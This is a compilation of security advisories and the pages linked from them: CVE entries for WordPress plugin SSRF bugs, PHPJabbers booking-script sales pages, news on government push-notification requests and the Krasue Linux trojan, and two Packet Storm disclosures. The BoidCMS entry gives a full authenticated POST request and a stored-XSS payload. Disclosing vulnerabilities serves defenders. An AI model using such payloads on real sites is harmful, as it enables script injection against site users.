Server-Side Request Forgery (SSRF) vulnerability in Paytm Paytm Payment Gateway.This issue affects Paytm Payment Gateway: from n/a through 2.7.0.



**Solution**

 Update to fix

 vPatch available

Update the WordPress Paytm Payment Gateway plugin to the latest available version (at least 2.7.3).

Aman Rawat discovered and reported this Server Side Request Forgery (SSRF) vulnerability in WordPress Paytm Payment Gateway Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information of other services running on the system. This vulnerability has been fixed in version 2.7.3.

**Other vulnerabilities in this plugin**

 0 present

 2 patched

View all

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2022-45362: WordPress Paytm Payment Gateway plugin <= 2.7.0 - Server Side Request Forgery (SSRF) vulnerability - Patchstack

Server-Side Request Forgery (SSRF) vulnerability in Softaculous Team SpeedyCache – Cache, Optimization, Performance.This issue affects SpeedyCache – Cache, Optimization, Performance: from n/a through 1.1.2.



**Solution**

 Update to fix

Update the WordPress SpeedyCache plugin to the latest available version (at least 1.1.3).

Yuchen Ji discovered and reported this Server Side Request Forgery (SSRF) vulnerability in WordPress SpeedyCache Plugin. This could allow a malicious actor to cause a website to execute website requests to an arbitrary domain of the attacker. This could allow a malicious actor to find sensitive information of other services running on the system. This vulnerability has been fixed in version 1.1.3.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-49746: WordPress SpeedyCache plugin <= 1.1.2 - Server Side Request Forgery (SSRF) vulnerability - Patchstack

Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden.
"Push notifications are alerts sent by phone apps to users' smartphones," Wyden said.
"These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of

Unspecified governments have demanded mobile push notification records from Apple and Google users to pursue people of interest, according to U.S. Senator Ron Wyden.

"Push notifications are alerts sent by phone apps to users' smartphones," Wyden said.

"These alerts pass through a digital post office run by the phone operating system provider -- overwhelmingly Apple or Google. Because of that structure, the two companies have visibility into how their customers use apps and could be compelled to provide this information to U.S. or foreign governments."

Wyden, in a letter to U.S. Attorney General Merrick Garland, said both Apple and Google confirmed receiving such requests but noted that information about the practice was restricted from public release by the U.S. government, raising questions about the transparency of legal demands they receive from governments.

When mobile apps for Android and iOS send push notifications to users' devices, they are routed through Apple and Google's own infrastructure known as the Apple Push Notification (APN) service and Firebase Cloud Messaging, respectively. Microsoft and Amazon have similar systems in place called Windows Push Notification Service (WNS) and Amazon Device Messaging (ADM).

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

As a result, the letter alleges that both companies can be compelled by governments to hand over the information. It's currently not clear which governments have sought notification data from Apple and Google.

That said, the U.S. is one among them, according to the Washington Post, which found more than two dozen search warrant applications related to federal requests for push notification data.

"The data these two companies receive includes metadata, detailing which app received a notification and when, as well as the phone and associated Apple or Google account to which that notification was intended to be delivered," the letter read.

"In certain instances, they also might also receive unencrypted content, which could range from backend directives for the app to the actual text displayed to a user in an app notification."

It also urged that Apple and Google should be permitted to disclose whether they have facilitated this practice, and if so, publish aggregate statistics about the number of demands they receive, and notify specific customers about demands for their data.

In a statement shared with Reuters, which first reported the development, Apple said the letter gave them the "opening" they needed to share more details about how governments monitored push notifications.

"When users allow an application they have installed to receive push notifications, an Apple Push Notification Service (APNs) token is generated and registered to that developer and device," Apple now notes in its updated Legal Process Guidelines document \[PDF\].

"Some apps may have multiple APNs tokens for one account on one device to differentiate between messages and multi-media. The Apple ID associated with a registered APNs token may be obtained with a subpoena or greater legal process."

Google, meanwhile, noted that it already publishes this information in its transparency reports although it's not specifically broken down by government requests for push notification records.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Governments May Spy on You by Requesting Push Notifications from Apple and Google

A cross-site-scripting vulnerability exists in Ruckus Access Point products (ZoneDirector, SmartZone, and AP Solo). If this vulnerability is exploited, an arbitrary script may be executed on the web browser of the user who is logging in the product. As for the affected products/models/versions, see the information provided by the vendor listed under [References] section or the list under [Product Status] section.

CVE-2023-49225: 20231128 | Security Bulletins | Ruckus Wireless Support

Appointment Scheduler 3.0 is vulnerable to CSV Injection via a Language > Labels > Export action.

Online appointment scheduling software to boost sales and manage bookings

Version: 3.0

Embed an easy appointment booking system into your website and manage appointment calendars, individual schedules, services, and rates. Our PHP-based Appointment Scheduler script is a flexible and highly efficient software solution suitable for various companies in the service sector. Use the appointment script as a standalone tool or easily integrate it into any other web-based system.

**Appointment Scheduler**

*   Highlights
*   Features
*   Demo
*   Faq
*   Knowledge Base
*   Pricing

**Product Highlights**

If you're looking for reliable online scheduling software that will help you organize your service schedule more efficiently, the Appointment Scheduler might just be the right solution for you! Give your customers an easy way to book and pay for the services you offer.

Book Appointments

Embed an online self-booking appointment scheduling tool to let clients book individual appointments and pay online.

Get Detailed Reports

You can get detailed reports in colorful graphic charts that help you monitor and understand the data easily.

Responsive Design

Both the front-end and back-end UI of our online Appointment Scheduler script are mobile-friendly and adapt to various screen sizes so you can access them on any device.

Add Multiple Languages

Easily translate the appointment scheduling script into any language and add it on the front end with a drop-down menu.

10 Responsive Front-End Themes

Choose between 10 different color themes for the mobile-friendly front end. We can further customize the themes for you upon request.

Confirmations & Reminders

The back-end system sends booking and payment notifications and reminders to both clients and admins via email & SMS.

Automatically Updated Schedule

The appointment scheduling software automatically updates the work timesheet and employees' availability.

PHP Source Code Customization

Get a developer-friendly license and make changes to our scheduling software. Or, request us to do them for you.

SPECIAL OFFER

**Appointment Scheduler for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Preview both the front end and back end of the Appointment Scheduler and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Appointment Scheduler**

**Key Benefits**

Payment Gateways

One admiN

Extended Licence

Installation Support

Script Modifications

**Pricing**

You can buy the Appointment Scheduler script both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with the Appointment Scheduler and how the script has improved their online business.

“

I found PHPJabbers customer service to be second to none. You guys truly stand behind your product. I will not hesitate to purchase any other PHP script I may need in the future from your company. Thank you so much for helping me install your appointment calendar on my site.

Pedro Baez

“

I found the PHPJabbers website while searching for appointment scheduling software. I'm so glad I found the site because there are loads of useful other scripts which I will no doubt use. All the scripts have a nice clean format which can be easily integrated into any website. The functionality is perfect for what I needed and the Appointment Scheduler script works well. I called on the help of the support team to install the script and they responded quickly and had me up and running in no time. I can't believe what excellent value the scripts provide and I am now about to purchase another PHP script for a new website I am working on. Brilliant work PHPJabbers, well done and many thanks.

Dean Williams

“

Excellent customer service. Looking forward to a long and prosperous relationship.

Ron Angelo

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Appointment Scheduler.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Time Slots Booking Calendar**

**Service Booking Script**

**Class Scheduling System**

**Cleaning Business Software**

**Availability Booking Calendar**

**Meeting Room Booking System**

CVE-2023-48841: Appointment Scheduler | Appointment Scheduling Software

A lack of rate limiting in pjActionAJaxSend in Time Slots Booking Calendar 4.0 allows attackers to cause resource exhaustion.

Make appointment booking and online scheduling easy with our time slot booking system!

Version: 3.3

Time Slots Booking Calendar is a real-time appointment calendar and online booking system that allows clients to book appointments with you. With the Time Slots Booking Calendar, you can schedule meetings both for individual and group appointments, while avoiding double bookings. Whether you're a hairdresser, therapist, or wellness worker, this is the perfect appointment booking software for your booking page. The setup is simple, with copy-paste script integration. Let your visitors schedule appointments, easily!

**Time Slots Booking Calendar**

*   Highlights
*   Features
*   Demo
*   Faq
*   Pricing

**Product Highlights**

Does your business involve scheduled services? Then you should consider adding a simple appointment scheduling software to your website to help you automate the booking process. Here are the features you can benefit from with our Time Slots Booking Calendar:

Configure time slots

Configure time slot length and add either regular or custom time slot lengths for any calendar date.

Front-end layouts

There are two front-end layouts for Time Slots Booking Calendar that work well both for iOS and Android devices. Switch between them using a simple drop-down menu.

Accept deposit payments

The time slot calendar supports online payments via PayPal, Authorize.net, as well as credit card payments and wire transfers.

Translate the calendar

Translate the booking calendar to any language you like thanks to a simple built-in language editor available in the Admin Panel.

Manage working hours

Edit and update your business hours as well as regular and custom work dates. This includes editing slot lengths, displaying lunch breaks, and adding days off.

Email & SMS notifications

Set default email & SMS reminders and send them out both to your own staff as well as clients to help reduce cancellations and no-shows.

Book group appointments

Use the time slot booking system to set up an online booking system for reserving group appointments.

Make custom changes

Get the Developer License and modify the Time Slots Booking Calendar according to your needs. Or ask us to do it for you! Compare licenses

SPECIAL OFFER

**Time Slots Booking Calendar for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Below is a preview of the Time Slots Booking Calendar. You can see both the front and the back-end view and test out all the functionalities.  
If you have any questions, do not hesitate to contact us.

**Time Slots Booking Calendar**

**Key Benefits**

Script Modifications

Remote Hosting

High Performance

Installation Support

Extended Licence

**Pricing**

You can buy the Time Slots Booking Calendar both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our appointment booking calendar and how the script has improved their online business.

“

Having wasted 3 days on finding a workable open source calendar booking script I finally decided to buy your excellent Time Slots Booking Calendar in order to run a tennis court booking system. The script was 90% perfect for the job but required some key modifications such as repeat and block booking and deletion. The service provided by PHPJabbers was incredibly fast, efficient and inexpensive. Thank you to Alexander 'Sasho' Valkanov for a superb job. I am happy to thoroughly recommend your PHP booking scripts and service to everyone. Fantastic service, really impressed.  
U2R Design, United Kingdom

Chris Woods

“

I am really happy to have found PHPJabbers.com. This is the first time I outsourced work and so I was quite nervous about doing it. But PHPJabbers team did a great job. They were able to make all the modifications I requested on quite a difficult booking system job. Kosta Todorov is very smart. I couldn't ask for a better team.

Mia Johnson

“

PHPjabbers has the most in-depth calendar software solution I've found on the web. The time slot booking system functions are great and offers everything we need and more. More importantly, the support we have received has been the best ever!!! They are fast, reliable and affordable. Thank you so much for making this booking calendar script such a wonderful solution for us!

Zach Kosturos

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Time Slots Booking Calendar.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

FTP Clients

See how to upload our scripts using different FTP clients.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Appointment Scheduler**

**Availability Booking Calendar**

**Event Booking Calendar**

**Class Scheduling System**

**Service Booking Script**

**Event Ticketing System**

CVE-2023-48833: Time Slots Booking Calendar | PHPJabbers

A lack of rate limiting in pjActionAJaxSend in Availability Booking Calendar 5.0 allows attackers to cause resource exhaustion.

A customizable PHP booking calendar script with multi-calendar support

Version: 5.0

The Availability Booking Calendar is a PHP calendar booking system that shows availability, allows bookings with a few easy steps, accepts online payments, and lets you manage reservations and bookings. Our script is suitable for single accommodation facilities such as holiday rentals, private villas, and apartments. Availability Booking Calendar script allows you to change colors, edit languages, create booking forms, and control settings. Get the PHP booking calendar script with the Developer License and customize it as you need.

**Availability Booking Calendar**

*   Highlights
*   Features
*   Demo
*   Faq
*   Knowledge Base
*   Pricing

**Product Highlights**

Add a smart reservation calendar to your website and show your clients your service schedule online so that they can easily book and pay in advance. The Availability Booking Calendar script will facilitate and improve both your customer relations as well as administration.

Multi-Calendar Support

Create as many availability booking calendars as you need. Each reservation calendar can be configured separately.

Multiple Languages

A language editor allows you to translate the PHP booking calendar script and add multiple languages on the front end.

Customizable Appearance

Manage booking calendars through the Admin Panel and make them perfectly fit your website style and content.

High Speed & Performance

The calendar booking system works flawlessly with heavy databases and loads quickly without reloading the entire web page.

Reservation Management

The Availability Booking Calendar enables script admins to easily review and manage both reservations and client details.

Email & SMS Notifications

The calendar booking system can be configured to send out email & SMS notifications to users upon new bookings and payments.

Payment Integration

The built-in payment module accepts online payments via PayPal and Authorize.net and also lets you process offline payments.

PHP Source Code Customization

You can either buy the Developer License and make your own changes, or get the User License and request the custom modifications from us.

SPECIAL OFFER

**Availability Booking Calendar for €4.59 Only**

Get all 65 PHPJabbers scripts in a bundle for just €279.

**Live Demo**

Preview both the front end and back end of the Availability Booking Calendar script and test out the whole functionality.  
If you have any questions or need technical advice, go ahead and contact us.

**Availability Booking Calendar**

**Key Benefits**

Key Features

Script Modifications

Customizations

Remote Hosting

Extended Licence

**Pricing**

You can buy the Availability Booking Calendar both with a Developer and a User License – compare them below.  
Do you need a custom modification? We'll happily do it for you! Just contact us, describe what you need, and we'll send you a quote!

Mega Sale deal

€4.59

per script

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Contact us and you'll receive quotation for the custom changes you may need

buy now

Free installation support

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

Mega Sale deal

€4.59 per script

Get 65 PHP Scripts

Modify the code

Copyright removal

Apply for Extended Licence and advertise our product on your website

Unlimited installations

Free updates

Get all minor updates for free

Custom modifications

Modify the software on your own or contact us and we will give you a quote

buy now

LIMITED OFFER

Get the Mega Sale bundle deal with all the PHP scripts you'll ever need for a total of

€279

VIEW DETAILS

**Testimonials**

Let our clients share their experience with our PHP Availability Booking Calendar script and how it has improved their online business.

“

I highly recommend the Availability Booking Calendar script. It is easy to install and administrate, yet it offers powerful features. This calendar booking system is also simple to use by customers. The PHPJabbers support is very quick and prices are very reasonable.

Axel Schmidt

“

I was looking for a PHP booking script and came across phpjabbers.com, but I wanted quite a few mods done. These guy sorted them out quickly and efficiently. The after sales support is fantastic as well. Thanks, team!

Mark Thompson

“

After looking at the availability booking calendar script and studied it I bought it. While Swedish is not the most used language it started out with problems to use the special characters. It took less than one hour for PHPJabbers support team to solve this for me. Now the booking form works perfectly - well invested money!

Anders Sjoberg

**FAQ & Knowledge Base**

Pre-Sale FAQ

Read the most Frequently Asked Questions about this script, its features and use.

Support Service FAQ

Read more about our Support Service and how we can help you install Availability Booking Calendar.

Custom Mods FAQ

Do you need something changed? We offer customization services.

How to install a Script

See how easy it is to install the script. Just follow the instructions or leave it all to us.

PHP Framework Used

We use our own in-house build framework which is really easy to understand and work with.

Our Services

We offer a wide range of web development       services.

License Types Explained

User and Developer licence available. We also have a special Extended Licence for webmasters.

Didn’t find exactly what you were looking for?

Contact Us

**Related Scripts**

**Event Booking Calendar**

**Time Slots Booking Calendar**

**Rental Property Booking Calendar**

**Availability Calendar**

**Appointment Scheduler**

**Hotel Booking System**

CVE-2023-48831: Availability Booking Calendar | Calendar Booking System

Availability Booking Calendar 5.0 is vulnerable to Multiple HTML Injection issues via SMS API Key or Default Country Code.

    # Exploit Title: PHPJabbers Availability Booking Calendar v5.0 - HTML Injection# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://www.phpjabbers.com/# Software Link:https://www.phpjabbers.com/availability-booking-calendar/#sectionDemo# Version: v5.0# Tested on: Windows 10, Windows 11, Linux# CVE-2023-48825Descriptions:HTML injection, also known as HTML code injection or cross-sitescripting (XSS), is a web security vulnerability that allows anattacker to inject malicious code into a web page that is then viewedby other users. This can lead to various attacks, such as stealingsensitive information, session hijacking, defacement of websites, ordelivering malware to users.Steps to Reproduce:1. Login your panel2. Go to System Menu then click SMS Settings.3. Then use any HTML Tag in "SMS API Key", "Default Country Code"input field and Save.4. You will see HTML code working here.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48825)

CVE-2023-48825: PHPJabbers Availability Booking Calendar 5.0 HTML Injection ≈ Packet Storm

BoidCMS 2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting (XSS) issues via the title, subtitle, footer, or keywords parameter in a page=create action.

    # Exploit Title: BoidCMS v2.0.1 - Multiple Stored XSS# Date: 13/11/2023# Exploit Author: BugsBD Limited# Discover by: Rahad Chowdhury# Vendor Homepage: https://boidcms.github.io/#/# Software Link: https://github.com/BoidCMS/BoidCMS/archive/refs/tags/v2.0.1.zip# Version: v2.0.1# Tested on: Windows 10, PHP 8.2.4, Apache 2.4.56# CVE: CVE-2023-48824Descriptions:BoidCMS v2.0.1 is vulnerable to Multiple Stored Cross-Site Scripting(XSS) Authenticated vulnerabilities in the "title, subtitle, footer,keywords" parameters of&nbsp;settings, create page.Steps to Reproduce:1. Request:POST /BoidCMS/admin?page=create HTTP/1.1Host: 192.168.1.74User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/119.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data;boundary=---------------------------9882691211259772119227456445Content-Length: 1492Origin: http://192.168.1.74Connection: closeReferer: http://192.168.1.74/BoidCMS/admin?page=createCookie: PHPSESSID=51i07vv0i4bqf0s9sl14tshq20;KOD_SESSION_SSO=8lu85nmqbd7o912f2lldm1g08k;KOD_SESSION_ID_53f4f=p7am25v0dladkuqetsqer4mdhcUpgrade-Insecure-Requests: 1-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="type"post-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="title"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="descr"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="keywords"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="content"test-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="permalink"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="tpl"theme.php-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="thumb"-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="date"2023-12-02T19:41-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="pub"true-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="token"83f330c1fea7a77a033324b848b5cd623d17d5cf25de1975ff2cce32badbe9cd-----------------------------9882691211259772119227456445Content-Disposition: form-data; name="create"Create-----------------------------9882691211259772119227456445--2. Now use xss payload "><img src=x onerror=alert(1)> on "title,subtitle, footer, keywords" parameters.3. Save and check home.## Reproduce:[href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48824)

CVE-2023-48824: BoidCMS 2.0.1 Cross Site Scripting ≈ Packet Storm

A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021.
Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report

Malware / Security Breach

A previously unknown Linux remote access trojan called Krasue has been observed targeting telecom companies in Thailand by threat actors to main covert access to victim networks at lease since 2021.

Named after a nocturnal female spirit of Southeast Asian folklore, the malware is "able to conceal its own presence during the initialization phase," Group-IB said in a report shared with The Hacker News.

The exact initial access vector used to deploy Krasue is currently not known, although it's suspected that it could be via vulnerability exploitation, credential brute-force attacks, or downloaded as part of a bogus software package or binary. The scale of the campaign is

UPCOMING WEBINAR

Cracking the Code: Learn How Cyber Attackers Exploit Human Psychology

Ever wondered why social engineering is so effective? Dive deep into the psychology of cyber attackers in our upcoming webinar.

Join Now

The malware's core functionalities are realized through a rootkit that allows it to maintain persistence on the host without attracting any attention. The rootkit is derived from open-source projects such as Diamorphine, Suterusu, and Rooty.

This has raised the possibility that Krasue is either deployed as part of a botnet or sold by initial access brokers to other cybercriminals, such as ransomware affiliates, who are looking to obtain access to a specific target.

"The rootkit can hook the \`kill()\` syscall, network-related functions, and file listing operations in order to hide its activities and evade detection," Group-IB malware analyst Sharmine Low said.

"Notably, Krasue uses RTSP (Real Time Streaming Protocol) messages to serve as a disguised 'alive ping,' a tactic rarely seen in the wild."

The trojan's command-and-control (C2) communications further allow it to designate a communicating IP as its master upstream C2 server, get information about the malware, and even terminate itself.

Krasue also shares several source code similarities with another Linux malware named XorDdos, indicating that it has been developed by the same author as the latter, or by actors who had access to its source code.

"The information available is not enough to put forward a conclusive attribution as to the creator of Krasue, or the groups that are leveraging it in the wild, but the fact that these malicious programs are able to remain under the radar for extended periods makes it clear that continuous vigilance and better security measures are necessary," Low said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web